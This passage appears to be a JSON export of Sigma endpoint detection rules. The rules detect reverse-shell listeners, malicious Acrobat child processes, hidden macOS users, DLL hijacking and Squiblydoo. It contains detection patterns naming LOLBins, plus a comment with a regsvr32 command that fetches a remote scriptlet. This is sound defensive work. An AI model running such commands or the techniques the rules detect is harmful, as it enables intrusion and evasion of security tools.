exclusion_nexcloud:\n ProcessImage: '/var/www/html/nextcloud/*/apps/notify_push/bin/x86_64/notify_push'\n\n exclusion_oracle:\n ProcessImage: '/tmp/CVU_*_resource/exectask'\n\n exclusion_vscode:\n ProcessImage: '/root/.vscode-server/bin/*/node'\n\n exclusion_k3s:\n ProcessImage|endswith: '/k3s/data/*/bin/k3s'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "08f3ae91-3811-4a4b-8f04-87302ca365c9", "rule_name": "Process Started Listening for Incoming Connections from Suspicious Path", "rule_description": "Detects a process that starts listening for incoming connections from a suspicious path.\nAttackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\nIt is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\n", "rule_creation_date": "2023-12-15", "rule_modified_date": "2026-02-27", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1104", "attack.t1205.001", "attack.t1571" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "08f5486f-0238-406f-a789-aad56def2bd3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.626532Z", "creation_date": "2026-03-23T11:45:34.626534Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.626538Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608", "https://attack.mitre.org/techniques/T1566/", "https://attack.mitre.org/techniques/T1203/", "https://attack.mitre.org/techniques/T1204/002/" ], "name": "t1104_acrobat_spawning_malicious_process.yml", "content": "title: Suspicious Process Started by Acrobat Reader\nid: 08f5486f-0238-406f-a789-aad56def2bd3\ndescription: |\n Detects the suspicious execution of binaries by Adobe Acrobat Reader.\n Adversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\n For example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\n It is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\nreferences:\n - https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/01/31\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_acrobat:\n ParentImage|endswith:\n - '\\Acrobat.exe'\n - '\\AcroRd32.exe'\n - '\\Acrobat_sl.exe'\n - '\\AcroCEF.exe'\n\n selection_bin:\n OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - 'appvlp.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n - 'extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n - 'calc.exe' # For POCs\n\n exclusion_msiexec_adobe:\n CommandLine|contains:\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALL=ALL REINSTALLMODE=omus /qb\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FF00-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-7AD7-1036-7B44-AC0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-0C0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # msiexec.exe /I {AC76BA86-1033-F400-BA7E-000000000004} ADDLOCAL=ChineseSLanguageSupport /qb\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1033-FFFF-7760-000000000006} REINSTALL=ALL REINSTALLMODE=omus /qb\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} '\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} ' # The two spaces are intentional\n - 'msiexec.exe /fmous {AC76BA86-????-????-????-????????????} '\n OriginalFileName: 'msiexec.exe'\n\n exclusion_spool:\n CommandLine|startswith:\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn140.DLL,MonitorPrintJobStatus *\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn175.dll,MonitorPrintJobStatus *\n - 'rundll32 ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - 'rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n # regsvr32 /s /n /i C:\\Windows\\system32\\spool\\DRIVERS\\W32X86\\3\\UDCOfficeAddin2000.dll\n - 'regsvr32 /s /n /i ?:\\Windows\\system32\\spool\\DRIVERS\\'\n - 'regsvr32 /s /n /i:OnPrinterAccess ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n\n exclusion_rundll32:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd MIIGq'\n - '?:\\WINDOWS\\System32\\RunDll32.exe ?:\\WINDOWS\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification '\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\eed_ec.dll,SpeedLauncher'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\System32\\rundll32.exe shwebsvc.dll,AddNetPlaceRunDll'\n\n exclusion_mailprotocolhandler:\n CommandLine|contains: 'rundll32.exe *,MailToProtocolHandler mailto:'\n\n exclusion_open_adobe_website:\n CommandLine|contains:\n - 'start microsoft-edge:http://www.adobe.com/'\n - 'start microsoft-edge:http://acrobat.adobe.com/'\n - 'start microsoft-edge:https://www.adobe.com/'\n - 'start microsoft-edge:https://acrobat.adobe.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "08f5486f-0238-406f-a789-aad56def2bd3", "rule_name": "Suspicious Process Started by Acrobat Reader", "rule_description": "Detects the suspicious execution of binaries by Adobe Acrobat Reader.\nAdversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\nFor example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\nIt is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\n", "rule_creation_date": "2023-01-31", "rule_modified_date": "2026-01-12", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.initial_access" ], "rule_technique_tags": [ "attack.t1203", "attack.t1204.002", "attack.t1566" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0915b4a3-17da-4c9c-bf08-1db96769b345", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.625928Z", "creation_date": "2026-03-23T11:45:34.625930Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.625934Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md", "https://attack.mitre.org/techniques/T1564/002/" ], "name": "t1564_002_create_hidden_user_macos.yml", "content": "title: Hidden User Created\nid: 0915b4a3-17da-4c9c-bf08-1db96769b345\ndescription: |\n Detects a suspicious attempt at creating a hidden user.\n Adversaries may use hidden users to hide the presence of user accounts they create or modify.\n It is recommended to check it the created account is expected to be created.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md\n - https://attack.mitre.org/techniques/T1564/002/\ndate: 2022/08/25\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base_dscl:\n Image: '/usr/bin/dscl'\n User: 'root'\n CommandLine|contains:\n - ' create'\n - ' -create'\n ParentImage|contains: '?'\n\n selection_specific_dscl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*UniqueID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - 'UniqueID ? '\n - 'UniqueID ?? '\n - 'UniqueID 1?? '\n - 'UniqueID 2?? '\n - 'UniqueID 3?? '\n - 'UniqueID 4?? '\n\n selection_specific_dscl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - 'UniqueID ?'\n - 'UniqueID ??'\n - 'UniqueID 1??'\n - 'UniqueID 2??'\n - 'UniqueID 3??'\n - 'UniqueID 4??'\n\n selection_specific_dscl_hidden_parameter:\n #CommandLine|re: '.*IsHidden *1.*'\n CommandLine|contains:\n - 'IsHidden *1'\n - 'IsHidden *true'\n\n selection_base_sysadminctl:\n Image: '/usr/sbin/sysadminctl'\n User: 'root'\n CommandLine|contains: ' -addUser'\n ParentImage|contains: '?'\n\n selection_specific_sysadminctl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*-UID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - '-UID ? '\n - '-UID ?? '\n - '-UID 1?? '\n - '-UID 2?? '\n - '-UID 3?? '\n - '-UID 4?? '\n\n selection_specific_sysadminctl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - '-UID ?'\n - '-UID ??'\n - '-UID 1??'\n - '-UID 2??'\n - '-UID 3??'\n - '-UID 4??'\n\n exclusion_jamf:\n # /usr/bin/dscl localhost -create /Local/Default/Users/mngt-admin IsHidden 1\n # parent:\n # /usr/local/jamf/bin/jamf postMdmEnrollment -server_url https://xxxx.jamfcloud.com -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n # jamf enroll -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyy -noPolicy\n - ProcessParentImage: '/usr/local/jamf/bin/jamf'\n - ProcessAncestors|contains: '|/usr/local/jamf/bin/jamf'\n\n exclusion_known_users:\n ProcessCommandLine|contains:\n - '/usr/bin/dscl . -create users/_fsvpn_' # fsecure\n - 'create /users/_nixbld' # nix\n - 'dscl . create /users/eset-ecsm-' # eset\n\n exclusion_windscribe:\n ProcessParentImage: '/Library/PrivilegedHelperTools/com.windscribe.helper.macos'\n\n exclusion_installer:\n - ProcessParentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_intune:\n ProcessGrandparentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n condition: ((selection_base_dscl and 1 of selection_specific_dscl_*) or (selection_base_sysadminctl and 1 of selection_specific_sysadminctl_*)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0915b4a3-17da-4c9c-bf08-1db96769b345", "rule_name": "Hidden User Created", "rule_description": "Detects a suspicious attempt at creating a hidden user.\nAdversaries may use hidden users to hide the presence of user accounts they create or modify.\nIt is recommended to check it the created account is expected to be created.\n", "rule_creation_date": "2022-08-25", "rule_modified_date": "2025-12-29", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1564.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "096b4462-7384-4447-95a6-a2c2c26ffcb0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.096369Z", "creation_date": "2026-03-23T11:45:34.096371Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.096375Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia", "https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/", "https://twitter.com/malwrhunterteam/status/1558149472672251904", "https://unit42.paloaltonetworks.com/dll-hijacking-techniques/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_mcods.yml", "content": "title: DLL Hijacking via McOds.exe\nid: 096b4462-7384-4447-95a6-a2c2c26ffcb0\ndescription: |\n Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\n - https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/\n - https://twitter.com/malwrhunterteam/status/1558149472672251904\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'McOds.exe'\n ImageLoaded|endswith: '\\McVsoCfg.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "096b4462-7384-4447-95a6-a2c2c26ffcb0", "rule_name": "DLL Hijacking via McOds.exe", "rule_description": "Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2024-03-20", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "09718066-8257-4dd4-83e0-14787bbc9fd3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.615428Z", "creation_date": "2026-03-23T11:45:34.615432Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.615439Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://car.mitre.org/analytics/CAR-2019-04-003/", "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", "https://github.com/cobbr/Covenant", "https://attack.mitre.org/techniques/T1218/010/", "https://lolbas-project.github.io/lolbas/Libraries/Scrobj/", "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/" ], "name": "t1218_010_squiblydoo.yml", "content": "title: Possible Squiblydoo Attack Detected\nid: 09718066-8257-4dd4-83e0-14787bbc9fd3\ndescription: |\n Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\n Attackers can used this technique to proxy execution of malicious code.\n This can be a sign of Covenant Regsvr32 launcher exploitation.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\nreferences:\n - https://car.mitre.org/analytics/CAR-2019-04-003/\n - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/010/\n - https://lolbas-project.github.io/lolbas/Libraries/Scrobj/\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\ndate: 2021/02/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Scrobj\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # regsvr32 /s /u /n /i:http://xxx.xxx.xxxx.xxx:9998/19jSi scrobj\n selection_1:\n - Image|endswith: '\\regsvr32.exe'\n - OriginalFileName: 'REGSVR32.EXE'\n selection_2:\n CommandLine|contains: 'scrobj'\n\n exclusion_scrobj:\n CommandLine:\n - '?:\\windows\\system32\\regsvr32.exe ?:\\windows\\system32\\scrobj.dll /s'\n - '?:\\WINDOWS\\SysWoW64\\regsvr32.exe ?:\\WINDOWS\\SysWoW64\\scrobj.dll /s'\n - 'regsvr32.exe /s ?:\\Windows??system32\\scrobj.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "09718066-8257-4dd4-83e0-14787bbc9fd3", "rule_name": "Possible Squiblydoo Attack Detected", "rule_description": "Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\nAttackers can used this technique to proxy execution of malicious code.\nThis can be a sign of Covenant Regsvr32 launcher exploitation.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\n", "rule_creation_date": "2021-02-10", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218.010" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.594813Z", "creation_date": "2026-03-23T11:45:34.594816Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.594824Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_pcalua.yml", "content": "title: DLL Hijacking via pcalua.exe\nid: 098502c3-27e1-4c6f-a53e-8fa8f3dd549f\ndescription: |\n Detects potential Windows DLL Hijacking via pcalua.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pcalua.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\pcaui.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f", "rule_name": "DLL Hijacking via pcalua.exe", "rule_description": "Detects potential Windows DLL Hijacking via pcalua.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "09c303fe-d535-4d15-9f45-17f91b3e39fc", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627557Z", "creation_date": "2026-03-23T11:45:34.627559Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627563Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.reliaquest.com/blog/double-extortion-attack-analysis/", "https://www.iobit.com/fr/iobit-unlocker.php", "https://attack.mitre.org/techniques/T1562/001/" ], "name": "t1562_001_execution_of_renamed_iobitunlocker_driver.yml", "content": "title: Renamed IObit Unlocker Driver Loaded\nid: 09c303fe-d535-4d15-9f45-17f91b3e39fc\ndescription: |\n Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\n This driver driver has been abused by adversaries to disable security tools and evade detection.\n It is recommended to analyze the host for other suspicious activities and to isolate it if needed.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Tool.IoBitUnlocker\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.VulnerableDriver\n - 